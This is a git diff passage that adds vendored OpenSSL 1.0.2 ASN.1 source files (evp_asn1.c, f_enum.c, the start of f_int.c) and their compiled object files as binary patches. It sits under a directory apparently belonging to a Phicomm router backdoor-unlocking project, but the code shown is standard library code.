+        if (!o2i_ECPublicKey(&(ret->pkey.ec),
+                             (const unsigned char **)pp, length)) {
+            ASN1err(ASN1_F_D2I_PUBLICKEY, ERR_R_ASN1_LIB);
+            goto err;
+        }
+        break;
+#endif
+    default:
+        ASN1err(ASN1_F_D2I_PUBLICKEY, ASN1_R_UNKNOWN_PUBLIC_KEY_TYPE);
+        goto err;
+        /* break; */
+    }
+    if (a != NULL)
+        (*a) = ret;
+    return (ret);
+ err:
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        EVP_PKEY_free(ret);
+    return (NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pu.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pu.o
new file mode 100644
index 0000000000000000000000000000000000000000..08b2ca12d4ab5d09d906daa4c251c5180bd83f26
GIT binary patch
literal 2224
zcmb`H-)qxQ6vuDZ{c?6$9g2g=2yBeWw$M&RH$|4NX*-Q>?w87(q3yCCxV0rsa23&q
zQ8DObZwmV6Kj5<uI#3WFd=vy<_Aqf;5M(fhi1VBzcg?c&Mf}3)J@=Dy?zz1;CwB!g
zQs(gxDi1kJiZe<H$y5~mUc>DrwZum@>Y9G>W4!){AMMva@FSx!{o`;<--zWm)oSrU
z>xKN9*1nDj{rcNjeno2%f-AxIFDrq(dI~?UYvIQT`1TCEu)ZnkUyV5g`-;JZOO!8e
zRjP*<w^Z#!|I+OiR@A@8^dCk>q28PXx2=ld78YxEn9E?LLXGJ^2j5XYmjA5z3Ux53
zheW-(;1|1_;Xhcr5rS*uqP{x8U*jkE>u*T3udjz~8%<~_Rb#ukV_cv!cv3T_!8=_6
zE^z#)iJ=gv9Lx`f#~8ghO3DaXLFNTR9W)2xxiv&Q3w}?duc~?(F5(REBi6Gm93zbX
zQJKIrEO`ZneOS&jZTBj|OklCH>=V-#X4nwZ5MulxrrJs>G2k7Slb_pekG-yM0PdCU
zc6XN7_;<S*&b$O~d9S>rYA*!hCGMN{8mG29r3R+;wtX6B1FQiI&)F#sfEzzug7=r;
z<0bfX3BFK*>m@ju?3$G_8kaPjK`k*in>;V)h!hnELcAyqL?Xk&h%~~7L_s3L*q}6c
zUbrfy<eNko8iGt!k`*Pb6dz?}RZ?>qxkzRwjm5*md~tm&J7fntOHV1XOh_y27lrTa
zez4!$rlJTz$bDdxUq%Q*j(taY8X*Wd14cQX2MT!|80Ak8f{^3=QT`4g2)VuP7lWGo
z0QfYXwK()0_Fhq3HaD-v6NJmEiaE|uPm$;1oGLG<gqw`3al$3CS;8gL^Yd~FSSqc`
z9Q1N$R*ffbSo7(W#$}XrMpo1u;fxjJ8EHz1&%+`92eGgQ_O7$DdV!&6ADA;Umijn0
zg5jC<g4xxE5VT_a5`z7Ob!bOoU!m|lK<@k!oI>a#C+>h4T=QS^gOH1B2Egp1_1o<b
zd|IE5JvL?!P0|26bcsC&48LBx-XWOJSotjYcG2^rECCLNI`i*a`B!M5H9GSrfV<t_
zx^;i_p78!Km*!LMRvSyLTJ>L8Blh?{mwaT-y8}d)E%+EGHd)K<5bQ~}eENx>+le$C
GXZ~Nrks{^*

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/evp_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/evp_asn1.c
new file mode 100644
index 0000000..5876afa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/evp_asn1.c
@@ -0,0 +1,195 @@
+/* crypto/asn1/evp_asn1.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1_mac.h>
+
+int ASN1_TYPE_set_octetstring(ASN1_TYPE *a, unsigned char *data, int len)
+{
+    ASN1_STRING *os;
+
+    if ((os = M_ASN1_OCTET_STRING_new()) == NULL)
+        return (0);
+    if (!M_ASN1_OCTET_STRING_set(os, data, len)) {
+        M_ASN1_OCTET_STRING_free(os);
+        return 0;
+    }
+    ASN1_TYPE_set(a, V_ASN1_OCTET_STRING, os);
+    return (1);
+}
+
+/* int max_len:  for returned value    */
+int ASN1_TYPE_get_octetstring(ASN1_TYPE *a, unsigned char *data, int max_len)
+{
+    int ret, num;
+    unsigned char *p;
+
+    if ((a->type != V_ASN1_OCTET_STRING) || (a->value.octet_string == NULL)) {
+        ASN1err(ASN1_F_ASN1_TYPE_GET_OCTETSTRING, ASN1_R_DATA_IS_WRONG);
+        return (-1);
+    }
+    p = M_ASN1_STRING_data(a->value.octet_string);
+    ret = M_ASN1_STRING_length(a->value.octet_string);
+    if (ret < max_len)
+        num = ret;
+    else
+        num = max_len;
+    memcpy(data, p, num);
+    return (ret);
+}
+
+int ASN1_TYPE_set_int_octetstring(ASN1_TYPE *a, long num, unsigned char *data,
+                                  int len)
+{
+    int n, size;
+    ASN1_OCTET_STRING os, *osp;
+    ASN1_INTEGER in;
+    unsigned char *p;
+    unsigned char buf[32];      /* when they have 256bit longs, I'll be in
+                                 * trouble */
+    in.data = buf;
+    in.length = 32;
+    os.data = data;
+    os.type = V_ASN1_OCTET_STRING;
+    os.length = len;
+    ASN1_INTEGER_set(&in, num);
+    n = i2d_ASN1_INTEGER(&in, NULL);
+    n += M_i2d_ASN1_OCTET_STRING(&os, NULL);
+
+    size = ASN1_object_size(1, n, V_ASN1_SEQUENCE);
+
+    if ((osp = ASN1_STRING_new()) == NULL)
+        return (0);
+    /* Grow the 'string' */
+    if (!ASN1_STRING_set(osp, NULL, size)) {
+        ASN1_STRING_free(osp);
+        return (0);
+    }
+
+    M_ASN1_STRING_length_set(osp, size);
+    p = M_ASN1_STRING_data(osp);
+
+    ASN1_put_object(&p, 1, n, V_ASN1_SEQUENCE, V_ASN1_UNIVERSAL);
+    i2d_ASN1_INTEGER(&in, &p);
+    M_i2d_ASN1_OCTET_STRING(&os, &p);
+
+    ASN1_TYPE_set(a, V_ASN1_SEQUENCE, osp);
+    return (1);
+}
+
+/*
+ * we return the actual length..., num may be missing, in which case, set it
+ * to zero
+ */
+/* int max_len:  for returned value    */
+int ASN1_TYPE_get_int_octetstring(ASN1_TYPE *a, long *num,
+                                  unsigned char *data, int max_len)
+{
+    int ret = -1, n;
+    ASN1_INTEGER *ai = NULL;
+    ASN1_OCTET_STRING *os = NULL;
+    const unsigned char *p;
+    long length;
+    ASN1_const_CTX c;
+
+    if ((a->type != V_ASN1_SEQUENCE) || (a->value.sequence == NULL)) {
+        goto err;
+    }
+    p = M_ASN1_STRING_data(a->value.sequence);
+    length = M_ASN1_STRING_length(a->value.sequence);
+
+    c.pp = &p;
+    c.p = p;
+    c.max = p + length;
+    c.error = ASN1_R_DATA_IS_WRONG;
+
+    M_ASN1_D2I_start_sequence();
+    c.q = c.p;
+    if ((ai = d2i_ASN1_INTEGER(NULL, &c.p, c.slen)) == NULL)
+        goto err;
+    c.slen -= (c.p - c.q);
+    c.q = c.p;
+    if ((os = d2i_ASN1_OCTET_STRING(NULL, &c.p, c.slen)) == NULL)
+        goto err;
+    c.slen -= (c.p - c.q);
+    if (!M_ASN1_D2I_end_sequence())
+        goto err;
+
+    if (num != NULL)
+        *num = ASN1_INTEGER_get(ai);
+
+    ret = M_ASN1_STRING_length(os);
+    if (max_len > ret)
+        n = ret;
+    else
+        n = max_len;
+
+    if (data != NULL)
+        memcpy(data, M_ASN1_STRING_data(os), n);
+    if (0) {
+ err:
+        ASN1err(ASN1_F_ASN1_TYPE_GET_INT_OCTETSTRING, ASN1_R_DATA_IS_WRONG);
+    }
+    if (os != NULL)
+        M_ASN1_OCTET_STRING_free(os);
+    if (ai != NULL)
+        M_ASN1_INTEGER_free(ai);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/evp_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/evp_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..c55da15873729e3474b029280bf4d29ae0eb8894
GIT binary patch
literal 4192
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
T()uj`Ue5lgk$<0QXkq^!zHBEK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_enum.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_enum.c
new file mode 100644
index 0000000..591c3b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_enum.c
@@ -0,0 +1,203 @@
+/* crypto/asn1/f_enum.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1.h>
+
+/* Based on a_int.c: equivalent ENUMERATED functions */
+
+int i2a_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *a)
+{
+    int i, n = 0;
+    static const char *h = "0123456789ABCDEF";
+    char buf[2];
+
+    if (a == NULL)
+        return (0);
+
+    if (a->length == 0) {
+        if (BIO_write(bp, "00", 2) != 2)
+            goto err;
+        n = 2;
+    } else {
+        for (i = 0; i < a->length; i++) {
+            if ((i != 0) && (i % 35 == 0)) {
+                if (BIO_write(bp, "\\\n", 2) != 2)
+                    goto err;
+                n += 2;
+            }
+            buf[0] = h[((unsigned char)a->data[i] >> 4) & 0x0f];
+            buf[1] = h[((unsigned char)a->data[i]) & 0x0f];
+            if (BIO_write(bp, buf, 2) != 2)
+                goto err;
+            n += 2;
+        }
+    }
+    return (n);
+ err:
+    return (-1);
+}
+
+int a2i_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *bs, char *buf, int size)
+{
+    int ret = 0;
+    int i, j, k, m, n, again, bufsize;
+    unsigned char *s = NULL, *sp;
+    unsigned char *bufp;
+    int num = 0, slen = 0, first = 1;
+
+    bs->type = V_ASN1_ENUMERATED;
+
+    bufsize = BIO_gets(bp, buf, size);
+    for (;;) {
+        if (bufsize < 1)
+            goto err_sl;
+        i = bufsize;
+        if (buf[i - 1] == '\n')
+            buf[--i] = '\0';
+        if (i == 0)
+            goto err_sl;
+        if (buf[i - 1] == '\r')
+            buf[--i] = '\0';
+        if (i == 0)
+            goto err_sl;
+        again = (buf[i - 1] == '\\');
+
+        for (j = 0; j < i; j++) {
+            if (!(((buf[j] >= '0') && (buf[j] <= '9')) ||
+                  ((buf[j] >= 'a') && (buf[j] <= 'f')) ||
+                  ((buf[j] >= 'A') && (buf[j] <= 'F')))) {
+                i = j;
+                break;
+            }
+        }
+        buf[i] = '\0';
+        /*
+         * We have now cleared all the crap off the end of the line
+         */
+        if (i < 2)
+            goto err_sl;
+
+        bufp = (unsigned char *)buf;
+        if (first) {
+            first = 0;
+            if ((bufp[0] == '0') && (buf[1] == '0')) {
+                bufp += 2;
+                i -= 2;
+            }
+        }
+        k = 0;
+        i -= again;
+        if (i % 2 != 0) {
+            ASN1err(ASN1_F_A2I_ASN1_ENUMERATED, ASN1_R_ODD_NUMBER_OF_CHARS);
+            goto err;
+        }
+        i /= 2;
+        if (num + i > slen) {
+            if (s == NULL)
+                sp = (unsigned char *)OPENSSL_malloc((unsigned int)num +
+                                                     i * 2);
+            else
+                sp = (unsigned char *)OPENSSL_realloc(s,
+                                                      (unsigned int)num +
+                                                      i * 2);
+            if (sp == NULL) {
+                ASN1err(ASN1_F_A2I_ASN1_ENUMERATED, ERR_R_MALLOC_FAILURE);
+                if (s != NULL)
+                    OPENSSL_free(s);
+                goto err;
+            }
+            s = sp;
+            slen = num + i * 2;
+        }
+        for (j = 0; j < i; j++, k += 2) {
+            for (n = 0; n < 2; n++) {
+                m = bufp[k + n];
+                if ((m >= '0') && (m <= '9'))
+                    m -= '0';
+                else if ((m >= 'a') && (m <= 'f'))
+                    m = m - 'a' + 10;
+                else if ((m >= 'A') && (m <= 'F'))
+                    m = m - 'A' + 10;
+                else {
+                    ASN1err(ASN1_F_A2I_ASN1_ENUMERATED,
+                            ASN1_R_NON_HEX_CHARACTERS);
+                    goto err;
+                }
+                s[num + j] <<= 4;
+                s[num + j] |= m;
+            }
+        }
+        num += i;
+        if (again)
+            bufsize = BIO_gets(bp, buf, size);
+        else
+            break;
+    }
+    bs->length = num;
+    bs->data = s;
+    ret = 1;
+ err:
+    if (0) {
+ err_sl:
+        ASN1err(ASN1_F_A2I_ASN1_ENUMERATED, ASN1_R_SHORT_LINE);
+    }
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_enum.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_enum.o
new file mode 100644
index 0000000000000000000000000000000000000000..e326acf717f08ab17e9772b13a218d93508bd572
GIT binary patch
literal 3408
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_int.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_int.c
new file mode 100644
index 0000000..4a81f81
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_int.c
@@ -0,0 +1,215 @@
+/* crypto/asn1/f_int.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
